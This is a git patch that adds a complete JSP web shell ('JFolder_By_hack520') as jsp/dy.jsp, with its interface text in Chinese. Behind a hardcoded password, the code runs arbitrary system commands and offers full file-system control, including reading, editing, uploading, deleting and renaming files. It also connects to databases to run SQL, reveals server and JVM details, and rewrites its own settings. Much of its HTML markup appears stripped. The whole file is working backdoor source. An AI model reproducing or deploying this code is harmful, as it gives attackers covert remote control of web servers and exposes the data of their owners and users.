From c94962d51af5f7fd28d4b4e9deb9c184792a0c73 Mon Sep 17 00:00:00 2001 From: tennc Date: Mon, 30 Nov 2015 22:50:17 +0800 Subject: [PATCH] Create dy.jsp --- jsp/dy.jsp | 1811 ++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 1811 insertions(+) create mode 100644 jsp/dy.jsp diff --git a/jsp/dy.jsp b/jsp/dy.jsp new file mode 100644 index 0000000..c5c99b2 --- /dev/null +++ b/jsp/dy.jsp @@ -0,0 +1,1811 @@ +<%@ page contentType="text/html; charset=GBK" %> +<%@ page import="java.io.*"%> +<%@ page import="java.util.Map"%> +<%@ page import="java.util.HashMap"%> +<%@ page import="java.nio.charset.Charset"%> +<%@ page import="java.util.regex.*"%> +<%@ page import="java.sql.*"%> +<%! +private String _password = "password"; +private String _encodeType = "GB2312"; +private int _sessionOutTime = 20; +private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"}; +private Connection _dbConnection = null; +private Statement _dbStatement = null; +private String _url = null; + +public boolean validate(String password) { + if (password.equals(_password)) { + return true; + } else { + return false; + } +} + +public String HTMLEncode(String str) { + str = str.replaceAll(" ", " "); + str = str.replaceAll("<", "<"); + str = str.replaceAll(">", ">"); + str = str.replaceAll("\r\n", "
"); + + return str; +} + +public String Unicode2GB(String str) { + String sRet = null; + + try { + sRet = new String(str.getBytes("ISO8859_1"), _encodeType); + } catch (Exception e) { + sRet = str; + } + + return sRet; +} + +public String exeCmd(String cmd) { + Runtime runtime = Runtime.getRuntime(); + Process proc = null; + String retStr = ""; + InputStreamReader insReader = null; + char[] tmpBuffer = new char[1024]; + int nRet = 0; + + try { + proc = runtime.exec(cmd); + insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); + + while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { + retStr += new String(tmpBuffer, 0, nRet); + } + + insReader.close(); + retStr = HTMLEncode(retStr); + } catch (Exception e) { + retStr = "bad command \"" + cmd + "\""; + } finally { + return retStr; + } +} + +public String pathConvert(String path) { + String sRet = path.replace('\\', '/'); + File file = new File(path); + + if (file.getParent() != null) { + if (file.isDirectory()) { + if (! sRet.endsWith("/")) + sRet += "/"; + } + } else { + if (! 
sRet.endsWith("/")) + sRet += "/"; + } + + return sRet; +} + +public String strCut(String str, int len) { + String sRet; + + len -= 3; + + if (str.getBytes().length <= len) { + sRet = str; + } else { + try { + sRet = (new String(str.getBytes(), 0, len, "GBK")) + "..."; + } catch (Exception e) { + sRet = str; + } + } + + return sRet; +} + +public String listFiles(String path, String curUri) { + File[] files = null; + File curFile = null; + String sRet = null; + int n = 0; + boolean isRoot = path.equals(""); + + path = pathConvert(path); + + try { + if (isRoot) { + files = File.listRoots(); + } else { + try { + curFile = new File(path); + String[] sFiles = curFile.list(); + files = new File[sFiles.length]; + + for (n = 0; n < sFiles.length; n ++) { + files[n] = new File(path + sFiles[n]); + } + } catch (Exception e) { + sRet = "bad path \"" + path + "\""; + } + } + + if (sRet == null) { + sRet = "\n"; + sRet += "\n"; + sRet += "\n"; + sRet += " \n"; + + if (curFile != null) { + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + } + + sRet += "\n"; + + sRet += " \n"; + + for (n = 0; n < files.length; n ++) { + sRet += " \n"; + + if (! isRoot) { + sRet += " \n"; + if (files[n].isDirectory()) { + sRet += " \n"; + } else { + sRet += " \n"; + } + + sRet += " \n"; + sRet += " \n"; + } else { + sRet += " \n"; + } + + sRet += " \n"; + } + sRet += " \n"; + sRet += "
\n"; + sRet += "  上级目录 "; + sRet += "创建目录 "; + sRet += "新建文件 "; + sRet += "删除 "; + sRet += "复制 "; + sRet += "重命名 "; + sRet += "上传文件\n"; + sRet += " \n"; + sRet += "
<" + strCut(files[n].getName(), 50) + ">" + strCut(files[n].getName(), 50) + "" + (files[n].isDirectory() ? "<dir>" : "") + ((! files[n].isDirectory()) && isTextFile(getExtName(files[n].getPath())) ? "<edit>" : "") + "" + files[n].length() + "" + pathConvert(files[n].getPath()) + "
\n"; + } + } catch (SecurityException e) { + sRet = "security violation, no privilege."; + } + + return sRet; +} + +public boolean isTextFile(String extName) { + int i; + boolean bRet = false; + + if (! extName.equals("")) { + for (i = 0; i < _textFileTypes.length; i ++) { + if (extName.equals(_textFileTypes[i])) { + bRet = true; + break; + } + } + } else { + bRet = true; + } + + return bRet; +} + +public String getExtName(String fileName) { + String sRet = ""; + int nLastDotPos; + + fileName = pathConvert(fileName); + + nLastDotPos = fileName.lastIndexOf("."); + + if (nLastDotPos == -1) { + sRet = ""; + } else { + sRet = fileName.substring(nLastDotPos + 1); + } + + return sRet; +} + +public String browseFile(String path) { + String sRet = ""; + File file = null; + FileReader fileReader = null; + + path = pathConvert(path); + + try { + file = new File(path); + fileReader = new FileReader(file); + String fileString = ""; + char[] chBuffer = new char[1024]; + int ret; + + sRet = "\n"; + + } catch (IOException e) { + sRet += "\n"; + } + + return sRet; +} + +public String openFile(String path, String curUri) { + String sRet = ""; + boolean canOpen = false; + int nLastDotPos = path.lastIndexOf("."); + String extName = ""; + String fileString = null; + File curFile = null; + + path = pathConvert(path); + + if (nLastDotPos == -1) { + canOpen = true; + } else { + extName = path.substring(nLastDotPos + 1); + canOpen = isTextFile(extName); + } + + if (canOpen) { + try { + fileString = ""; + curFile = new File(path); + FileReader fileReader = new FileReader(curFile); + char[] chBuffer = new char[1024]; + int nRet; + + while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) { + fileString += new String(chBuffer, 0, nRet); + } + + fileReader.close(); + } catch (IOException e) { + fileString = null; + sRet = "不能打开文件\"" + path + "\""; + } catch (SecurityException e) { + fileString = null; + sRet = "安全问题,没有权限执行该操作"; + } + } else { + sRet = "file \"" + path + "\" is not a text 
file, can't be opened in text mode"; + } + + if (fileString != null) { + sRet += "\n"; + sRet += "\n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += "
[上级目录]
\n"; + sRet += " \n"; + sRet += "
 
\n"; + } + + return sRet; +} + +public String saveFile(String path, String curUri, String fileContent) { + String sRet = ""; + File file = null; + + path = pathConvert(path); + + try { + file = new File(path); + + if (! file.canWrite()) { + sRet = "文件不可写"; + } else { + FileWriter fileWriter = new FileWriter(file); + fileWriter.write(fileContent); + + fileWriter.close(); + sRet = "文件保存成功,正在返回,请稍候……\n"; + sRet += "\n"; + } + } catch (IOException e) { + sRet = "保存文件失败"; + } catch (SecurityException e) { + sRet = "安全问题,没有权限执行该操作"; + } + + return sRet; +} + +public String createFolder(String path, String curUri, String folderName) { + String sRet = ""; + File folder = null; + + path = pathConvert(path); + + try { + folder = new File(path + folderName); + + if (folder.exists() && folder.isDirectory()) { + sRet = "\"" + path + folderName + "\"目录已经存在"; + } else { + if (folder.mkdir()) { + sRet = "成功创建目录\"" + pathConvert(folder.getPath()) + "\",正在返回,请稍候……\n"; + sRet += ""; + } else { + sRet = "创建目录\"" + folderName + "\"失败"; + } + } + } catch (SecurityException e) { + sRet = "安全问题,没有权限执行该操作"; + } + + return sRet; +} + +public String createFile(String path, String curUri, String fileName) { + String sRet = ""; + File file = null; + + path = pathConvert(path); + + try { + file = new File(path + fileName); + + if (file.createNewFile()) { + sRet = ""; + } else { + sRet = "\"" + path + fileName + "\"文件已经存在"; + } + } catch (SecurityException e) { + sRet = "安全问题,没有权限执行该操作"; + } catch (IOException e) { + sRet = "创建文件\"" + path + fileName + "\"失败"; + } + + return sRet; +} + +public String deleteFile(String path, String curUri, String[] files2Delete) { + String sRet = ""; + File tmpFile = null; + + try { + for (int i = 0; i < files2Delete.length; i ++) { + tmpFile = new File(files2Delete[i]); + if (! tmpFile.delete()) { + sRet += "删除\"" + files2Delete[i] + "\"失败
\n"; + } + } + + if (sRet.equals("")) { + sRet = "删除成功,正在返回,请稍候……\n"; + sRet += ""; + } + } catch (SecurityException e) { + sRet = "安全问题,没有权限执行该操作\n"; + } + + return sRet; +} + +public String saveAs(String path, String curUri, String fileContent) { + String sRet = ""; + File file = null; + FileWriter fileWriter = null; + + try { + file = new File(path); + + if (file.createNewFile()) { + fileWriter = new FileWriter(file); + fileWriter.write(fileContent); + fileWriter.close(); + + sRet = ""; + } else { + sRet = "文件\"" + path + "\"已经存在"; + } + } catch (IOException e) { + sRet = "创建文件\"" + path + "\"失败"; + } + + return sRet; +} + + +public String uploadFile(ServletRequest request, String path, String curUri) { + String sRet = ""; + File file = null; + InputStream in = null; + + path = pathConvert(path); + + try { + in = request.getInputStream(); + + byte[] inBytes = new byte[request.getContentLength()]; + int nBytes; + int start = 0; + int end = 0; + int size = 1024; + String token = null; + String filePath = null; + + // + // 把输入流读入一个字节数组 + // + while ((nBytes = in.read(inBytes, start, size)) != -1) { + start += nBytes; + } + + in.close(); + // + // 从字节数组中得到文件分隔符号 + // + int i = 0; + byte[] seperator; + + while (inBytes[i] != 13) { + i ++; + } + + seperator = new byte[i]; + + for (i = 0; i < seperator.length; i ++) { + seperator[i] = inBytes[i]; + } + + // + // 得到Header部分 + // + String dataHeader = null; + i += 3; + start = i; + while (! 
(inBytes[i] == 13 && inBytes[i + 2] == 13)) { + i ++; + } + end = i - 1; + dataHeader = new String(inBytes, start, end - start + 1); + + // + // 得到文件名 + // + token = "filename=\""; + start = dataHeader.indexOf(token) + token.length(); + token = "\""; + end = dataHeader.indexOf(token, start) - 1; + filePath = dataHeader.substring(start, end + 1); + filePath = pathConvert(filePath); + String fileName = filePath.substring(filePath.lastIndexOf("/") + 1); + + // + // 得到文件内容开始位置 + // + i += 4; + start = i; + + /* + boolean found = true; + byte[] tmp = new byte[seperator.length]; + while (i <= inBytes.length - 1 - seperator.length) { + + for (int j = i; j < i + seperator.length; j ++) { + if (seperator[j - i] != inBytes[j]) { + found = false; + break; + } else + tmp[j - i] = inBytes[j]; + } + + if (found) + break; + + i ++; + }*/ + + // + // 偷懒的办法 + // + end = inBytes.length - 1 - 2 - seperator.length - 2 - 2; + + // + // 保存为文件 + // + File newFile = new File(path + fileName); + newFile.createNewFile(); + FileOutputStream out = new FileOutputStream(newFile); + + //out.write(inBytes, start, end - start + 1); + out.write(inBytes, start, end - start + 1); + out.close(); + + sRet = "\n"; + } catch (IOException e) { + sRet = "\n"; + } + + sRet += ""; + return sRet; +} + +public boolean fileCopy(String srcPath, String dstPath) { + boolean bRet = true; + + try { + FileInputStream in = new FileInputStream(new File(srcPath)); + FileOutputStream out = new FileOutputStream(new File(dstPath)); + byte[] buffer = new byte[1024]; + int nBytes; + + + while ((nBytes = in.read(buffer, 0, 1024)) != -1) { + out.write(buffer, 0, nBytes); + } + + in.close(); + out.close(); + } catch (IOException e) { + bRet = false; + } + + return bRet; +} + +public String getFileNameByPath(String path) { + String sRet = ""; + + path = pathConvert(path); + + if (path.lastIndexOf("/") != -1) { + sRet = path.substring(path.lastIndexOf("/") + 1); + } else { + sRet = path; + } + + return sRet; +} + +public String 
copyFiles(String path, String curUri, String[] files2Copy, String dstPath) { + String sRet = ""; + int i; + + path = pathConvert(path); + dstPath = pathConvert(dstPath); + + for (i = 0; i < files2Copy.length; i ++) { + if (! fileCopy(files2Copy[i], dstPath + getFileNameByPath(files2Copy[i]))) { + sRet += "文件\"" + files2Copy[i] + "\"复制失败
"; + } + } + + if (sRet.equals("")) { + sRet = "文件复制成功,正在返回,请稍候……"; + sRet += ""; + } + + return sRet; +} + +public boolean isFileName(String fileName) { + boolean bRet = false; + + Pattern p = Pattern.compile("^[a-zA-Z0-9][\\w\\.]*[\\w]$"); + Matcher m = p.matcher(fileName); + + bRet = m.matches(); + + return bRet; +} + +public String renameFile(String path, String curUri, String file2Rename, String newName) { + String sRet = ""; + + path = pathConvert(path); + file2Rename = pathConvert(file2Rename); + + try { + File file = new File(file2Rename); + + newName = file2Rename.substring(0, file2Rename.lastIndexOf("/") + 1) + newName; + File newFile = new File(newName); + + if (! file.exists()) { + sRet = "文件\"" + file2Rename + "\"不存在"; + } else { + file.renameTo(newFile); + sRet = "文件重命名成功,正在返回,请稍候……"; + sRet += ""; + } + } catch (SecurityException e) { + sRet = "安全问题导致文件\"" + file2Rename + "\"复制失败"; + } + + return sRet; +} + +public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) { + boolean bRet = true; + String driverName = ""; + + if (dbServer.equals("")) + dbServer = "localhost"; + + try { + if (dbType.equals("sqlserver")) { + driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver"; + if (dbPort.equals("")) + dbPort = "1433"; + _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; + } else if (dbType.equals("mysql")) { + driverName = "com.mysql.jdbc.Driver"; + if (dbPort.equals("")) + dbPort = "3306"; + _url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; + } else if (dbType.equals("odbc")) { + driverName = "sun.jdbc.odbc.JdbcOdbcDriver"; + _url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword; + } else if (dbType.equals("oracle")) { + driverName = "oracle.jdbc.driver.OracleDriver"; + _url = 
"jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName; + } else if (dbType.equals("db2")) { + driverName = "com.ibm.db2.jdbc.app.DB2Driver"; + _url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName; + } + + Class.forName(driverName); + } catch (ClassNotFoundException e) { + bRet = false; + } + + return bRet; +} + +public boolean DBConnect(String User, String Password) { + boolean bRet = false; + + if (_url != null) { + try { + _dbConnection = DriverManager.getConnection(_url, User, Password); + _dbStatement = _dbConnection.createStatement(); + bRet = true; + } catch (SQLException e) { + bRet = false; + } + } + + return bRet; +} + +public String DBExecute(String sql) { + String sRet = ""; + + if (_dbConnection == null || _dbStatement == null) { + sRet = "数据库没有正常连接"; + } else { + try { + if (sql.toLowerCase().substring(0, 6).equals("select")) { + ResultSet rs = _dbStatement.executeQuery(sql); + ResultSetMetaData rsmd = rs.getMetaData(); + int colNum = rsmd.getColumnCount(); + int colType; + + sRet = "sql语句执行成功,返回结果
\n"; + sRet += "\n"; + sRet += " \n"; + for (int i = 1; i <= colNum; i ++) { + sRet += " \n"; + } + sRet += " \n"; + while (rs.next()) { + sRet += " \n"; + for (int i = 1; i <= colNum; i ++) { + colType = rsmd.getColumnType(i); + + sRet += " \n"; + } + sRet += " \n"; + } + sRet += "
" + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")
"; + switch (colType) { + case Types.BIGINT: + sRet += rs.getLong(i); + break; + + case Types.BIT: + sRet += rs.getBoolean(i); + break; + + case Types.BOOLEAN: + sRet += rs.getBoolean(i); + break; + + case Types.CHAR: + sRet += rs.getString(i); + break; + + case Types.DATE: + sRet += rs.getDate(i).toString(); + break; + + case Types.DECIMAL: + sRet += rs.getDouble(i); + break; + + case Types.NUMERIC: + sRet += rs.getDouble(i); + break; + + case Types.REAL: + sRet += rs.getDouble(i); + break; + + case Types.DOUBLE: + sRet += rs.getDouble(i); + break; + + case Types.FLOAT: + sRet += rs.getFloat(i); + break; + + case Types.INTEGER: + sRet += rs.getInt(i); + break; + + case Types.TINYINT: + sRet += rs.getShort(i); + break; + + case Types.VARCHAR: + sRet += rs.getString(i); + break; + + case Types.TIME: + sRet += rs.getTime(i).toString(); + break; + + case Types.DATALINK: + sRet += rs.getTimestamp(i).toString(); + break; + } + sRet += "
\n"; + + rs.close(); + } else { + if (_dbStatement.execute(sql)) { + sRet = "sql语句执行成功"; + } else { + sRet = "sql语句执行失败"; + } + } + } catch (SQLException e) { + sRet = "sql语句执行失败"; + } + } + + return sRet; +} + +public void DBRelease() { + try { + if (_dbStatement != null) { + _dbStatement.close(); + _dbStatement = null; + } + + if (_dbConnection != null) { + _dbConnection.close(); + _dbConnection = null; + } + } catch (SQLException e) { + + } +} + +///////////////////////////////////////////////////////////////////////////////////////////////////////////////// + +class JshellConfig { + private String _jshellContent = null; + private String _path = null; + + public JshellConfig(String path) throws JshellConfigException { + _path = path; + read(); + } + + private void read() throws JshellConfigException { + try { + FileReader jshell = new FileReader(new File(_path)); + char[] buffer = new char[1024]; + int nChars; + _jshellContent = ""; + + while ((nChars = jshell.read(buffer, 0, 1024)) != -1) { + _jshellContent += new String(buffer, 0, nChars); + } + + jshell.close(); + } catch (IOException e) { + throw new JshellConfigException("打开文件失败"); + } + } + + public void save() throws JshellConfigException { + FileWriter jshell = null; + + try { + jshell = new FileWriter(new File(_path)); + char[] buffer = _jshellContent.toCharArray(); + int start = 0; + int size = 1024; + + for (start = 0; start < buffer.length - 1 - size; start += size) { + jshell.write(buffer, start, size); + } + + jshell.write(buffer, start, buffer.length - 1 - start); + } catch (IOException e) { + new JshellConfigException("写文件失败"); + } finally { + try { + jshell.close(); + } catch (IOException e) { + + } + } + } + + public void setPassword(String password) throws JshellConfigException { + Pattern p = Pattern.compile("\\w+"); + Matcher m = p.matcher(password); + + if (! 
m.matches()) { + throw new JshellConfigException("密码不能有除字母数字下划线以外的字符"); + } + + p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\""); + m = p.matcher(_jshellContent); + if (! m.find()) { + throw new JshellConfigException("程序体已经被非法修改"); + } + + _jshellContent = m.replaceAll("private String _password = \"" + password + "\""); + + //return HTMLEncode(_jshellContent); + } + + public void setEncodeType(String encodeType) throws JshellConfigException { + Pattern p = Pattern.compile("[A-Za-z0-9]+"); + Matcher m = p.matcher(encodeType); + + if (! m.matches()) { + throw new JshellConfigException("编码格式只能是字母和数字的组合"); + } + + p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\""); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("程序体已经被非法修改"); + } + + _jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\""); + //return HTMLEncode(_jshellContent); + } + + public void setSessionTime(String sessionTime) throws JshellConfigException { + Pattern p = Pattern.compile("\\d+"); + Matcher m = p.matcher(sessionTime); + + if (! m.matches()) { + throw new JshellConfigException("session超时时间只能填数字"); + } + + p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("程序体已经被非法修改"); + } + + _jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime); + //return HTMLEncode(_jshellContent); + } + + public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException { + Pattern p = Pattern.compile("\\w+"); + Matcher m = null; + int i; + String fileTypes = ""; + String tmpFileTypes = ""; + + for (i = 0; i < textFileTypes.length; i ++) { + m = p.matcher(textFileTypes[i]); + + if (! 
m.matches()) { + throw new JshellConfigException("扩展名只能是字母数字和下划线的组合"); + } + + if (i != textFileTypes.length - 1) + fileTypes += "\"" + textFileTypes[i] + "\"" + ", "; + else + fileTypes += "\"" + textFileTypes[i] + "\""; + } + + for (i = 0; i < _textFileTypes.length; i ++) { + if (i != _textFileTypes.length - 1) + tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", "; + else + tmpFileTypes += "\"" + _textFileTypes[i] + "\""; + } + + p = Pattern.compile(tmpFileTypes); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("程序文件已经被非法修改"); + } + + _jshellContent = m.replaceAll(fileTypes); + + //return HTMLEncode(_jshellContent); + } + + public String getContent() { + return HTMLEncode(_jshellContent); + } +} + +class JshellConfigException extends Exception { + public JshellConfigException(String message) { + super(message); + } +} +%> + + +测试 + + + + +<% +session.setMaxInactiveInterval(_sessionOutTime * 60); + +if (request.getParameter("password") == null && session.getAttribute("password") == null) { +// show the login form +//================================================================================================ +%> +
+ + + + +
+ + + + + + + + + + + + + + + +
8管理登录 :::...JFolder_By_hack520
+ + +
+
+<% +//================================================================================================ +// end of the login form +} else { + String password = null; + + if (session.getAttribute("password") == null) { + password = (String)request.getParameter("password"); + + if (validate(password) == false) { + out.println("
  • 哎呀,倒霉死啦!
  • "); + out.close(); + return; + } + + session.setAttribute("password", password); + } else { + password = (String)session.getAttribute("password"); + } + + String action = null; + + + if (request.getParameter("action") == null) + action = "main"; + else + action = (String)request.getParameter("action"); + + if (action.equals("exit")) { + session.removeAttribute("password"); + response.sendRedirect(request.getRequestURI()); + out.close(); + return; + } + +// show the main menu +//==================================================================================== +%> + + + + + + + +
    + + +
    +<% +//===================================================================================== +// end of main menu + + if (action.equals("main")) { +// print the system info table +//======================================================================================= +%> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    服务器信息
    服务器名<%=request.getServerName()%>
    服务器端口<%=request.getServerPort()%>
    操作系统<%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%>
    当前用户名<%=System.getProperty("user.name")%>
    当前用户目录<%=System.getProperty("user.home")%>
    当前用户工作目录<%=System.getProperty("user.dir")%>
    程序相对路径<%=request.getRequestURI()%>
    程序绝对路径<%=request.getRealPath(request.getServletPath())%>
    网络协议<%=request.getProtocol()%>
    服务器软件版本信息<%=application.getServerInfo()%>
    JDK版本<%=System.getProperty("java.version")%>
    JDK安装路径<%=System.getProperty("java.home")%>
    JAVA虚拟机版本<%=System.getProperty("java.vm.specification.version")%>
    JAVA虚拟机名<%=System.getProperty("java.vm.name")%>
    JAVA类路径<%=System.getProperty("java.class.path")%>
    JAVA载入库搜索路径<%=System.getProperty("java.library.path")%>
    JAVA临时目录<%=System.getProperty("java.io.tmpdir")%>
    JIT编译器名<%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%>
    扩展目录路径<%=System.getProperty("java.ext.dirs")%>
    客户端信息
    客户机地址<%=request.getRemoteAddr()%>
    服务机器名<%=request.getRemoteHost()%>
    用户名<%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%>
    请求方式<%=request.getScheme()%>
    应用安全套接字层<%=request.isSecure() == true ? "是" : "否"%>
    +<% +//======================================================================================= +// end of printing the system info table +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("filesystem")) { + String curPath = ""; + String result = ""; + String fsAction = ""; + + if (request.getParameter("curPath") == null) { + curPath = request.getRealPath(request.getServletPath()); + curPath = pathConvert((new File(curPath)).getParent()); + } else { + curPath = Unicode2GB((String)request.getParameter("curPath")); + } + + if (request.getParameter("fsAction") == null) { + fsAction = "list"; + } else { + fsAction = (String)request.getParameter("fsAction"); + } + + if (fsAction.equals("list")) + result = listFiles(curPath, request.getRequestURI() + "?action=" + action); + else if (fsAction.equals("browse")) { + result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action); + result += browseFile(curPath); + } + else if (fsAction.equals("open")) + result = openFile(curPath, request.getRequestURI() + "?action=" + action); + else if (fsAction.equals("save")) { + if (request.getParameter("fileContent") == null) { + result = "页面导航错误"; + } else { + String fileContent = Unicode2GB((String)request.getParameter("fileContent")); + result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent); + } + } else if (fsAction.equals("createFolder")) { + if (request.getParameter("folderName") == null) { + result = "目录名不能为空"; + } else { + String folderName = Unicode2GB(request.getParameter("folderName").trim()); + if (folderName.equals("")) { + result = "目录名不能为空"; + } else { + result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName); + } + } + } else if (fsAction.equals("createFile")) { + if (request.getParameter("fileName") == null) { + result = "文件名不能为空"; + } else { + String fileName = 
Unicode2GB(request.getParameter("fileName").trim()); + if (fileName.equals("")) { + result = "文件名不能为空"; + } else { + result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName); + } + } + } else if (fsAction.equals("deleteFile")) { + if (request.getParameter("filesDelete") == null) { + result = "没有选择要删除的文件"; + } else { + String[] files2Delete = (String[])request.getParameterValues("filesDelete"); + if (files2Delete.length == 0) { + result = "没有选择要删除的文件"; + } else { + for (int n = 0; n < files2Delete.length; n ++) { + files2Delete[n] = Unicode2GB(files2Delete[n]); + } + result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete); + } + } + } else if (fsAction.equals("saveAs")) { + if (request.getParameter("fileContent") == null) { + result = "页面导航错误"; + } else { + String fileContent = Unicode2GB(request.getParameter("fileContent")); + result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent); + } + } else if (fsAction.equals("upload")) { + result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action); + } else if (fsAction.equals("copyto")) { + if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) { + result = "没有选择要复制的文件"; + } else { + String[] files2Copy = request.getParameterValues("filesDelete"); + String dstPath = request.getParameter("dstPath").trim(); + if (files2Copy.length == 0) { + result = "没有选择要复制的文件"; + } else if (dstPath.equals("")) { + result = "没有填写要复制到的目录路径"; + } else { + for (int i = 0; i < files2Copy.length; i ++) + files2Copy[i] = Unicode2GB(files2Copy[i]); + + result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath)); + } + } + } else if (fsAction.equals("rename")) { + if (request.getParameter("fileRename") == null) { + result = "页面导航错误"; + } else { + String file2Rename = request.getParameter("fileRename").trim(); + String newName = 
request.getParameter("newName").trim(); + if (file2Rename.equals("")) { + result = "没有选择要重命名的文件"; + } else if (newName.equals("")) { + result = "没有填写新文件名"; + } else { + result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName)); + } + } + } +%> + + + + + + + + + +
    地址 +
    <%= result.trim().equals("")?" " : result%>
    +<% +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("command")) { + String cmd = ""; + InputStream ins = null; + String result = ""; + + if (request.getParameter("command") != null) { + cmd = (String)request.getParameter("command"); + result = exeCmd(cmd); + } +// print the command form +//======================================================================================== +%> + + + + + + + + + + + + +
    执行命令
    + + +
    执行结果
    + + + + +
    <%=result == "" ? " " : result%>
    +<% +//========================================================================================= +// end of printing command form +/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("database")) { + String dbAction = ""; + String result = ""; + String dbType = ""; + String dbServer = ""; + String dbPort = ""; + String dbUsername = ""; + String dbPassword = ""; + String dbName = ""; + String dbResult = ""; + String sql = ""; + + if (request.getParameter("dbAction") == null) { + dbAction = "main"; + } else { + dbAction = request.getParameter("dbAction").trim(); + if (dbAction.equals("")) + dbAction = "main"; + } + + if (dbAction.equals("main")) { + result = " "; + } else if (dbAction.equals("dbConnect")) { + if (request.getParameter("dbType") == null || + request.getParameter("dbServer") == null || + request.getParameter("dbPort") == null || + request.getParameter("dbUsername") == null || + request.getParameter("dbPassword") == null || + request.getParameter("dbName") == null) { + response.sendRedirect(request.getRequestURI() + "?action=" + action); + } else { + dbType = request.getParameter("dbType").trim(); + dbServer = request.getParameter("dbServer").trim(); + dbPort = request.getParameter("dbPort").trim(); + dbUsername = request.getParameter("dbUsername").trim(); + dbPassword = request.getParameter("dbPassword").trim(); + dbName = request.getParameter("dbName").trim(); + + if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) { + if (DBConnect(dbUsername, dbPassword)) { + if (request.getParameter("sql") != null) { + sql = request.getParameter("sql").trim(); + if (! sql.equals("")) { + dbResult = DBExecute(sql); + } + } + + result = "\n"; + result += "sql语句

     \n"; + + DBRelease(); + } else { + result = "数据库连接失败"; + } + } else { + result = "数据库连接驱动没有找到"; + } + } + } +%> + + + "> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    数据库连接类型 + + +
    数据库服务器地址
    数据库服务器端口
    数据库用户名
    数据库密码
    数据库名
    <%=result%>
    + + + + +
    + <%=dbResult%> +
    +<% + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("config")) { + String cfAction = ""; + int i; + + if (request.getParameter("cfAction") == null) { + + cfAction = "main"; + } else { + cfAction = request.getParameter("cfAction").trim(); + if (cfAction.equals("")) + cfAction = "main"; + } + + if (cfAction.equals("main")) { +// start of config form +//========================================================================================== +%> + + + " onSubmit="javascript:selectAllTypes()"> + + + + + + + + + + + + + + + + + + + + +
    密码
    系统编码
    Session超时时间
    可编辑文件类型 + + + + + + +
    + + + +

    + +
    + +
    +
    +<% + } else if (cfAction.equals("save")) { + if (request.getParameter("password") == null || + request.getParameter("encode") == null || + request.getParameter("sessionTime") == null || + request.getParameterValues("textFileTypes") == null) { + response.sendRedirect(request.getRequestURI()); + } + + String result = ""; + + String newPassword = request.getParameter("password").trim(); + String newEncodeType = request.getParameter("encode").trim(); + String newSessionTime = request.getParameter("sessionTime").trim(); + String[] newTextFileTypes = request.getParameterValues("textFileTypes"); + String jshellPath = request.getRealPath(request.getServletPath()); + + try { + JshellConfig jconfig = new JshellConfig(jshellPath); + jconfig.setPassword(newPassword); + jconfig.setEncodeType(newEncodeType); + jconfig.setSessionTime(newSessionTime); + jconfig.setTextFileTypes(newTextFileTypes); + jconfig.save(); + result += "设置保存成功,正在返回,请稍候……"; + result += ""; + } catch (JshellConfigException e) { + result = "" + e.getMessage() + ""; + } + +%> + + + + +
    <%=result == "" ? " " : result%>
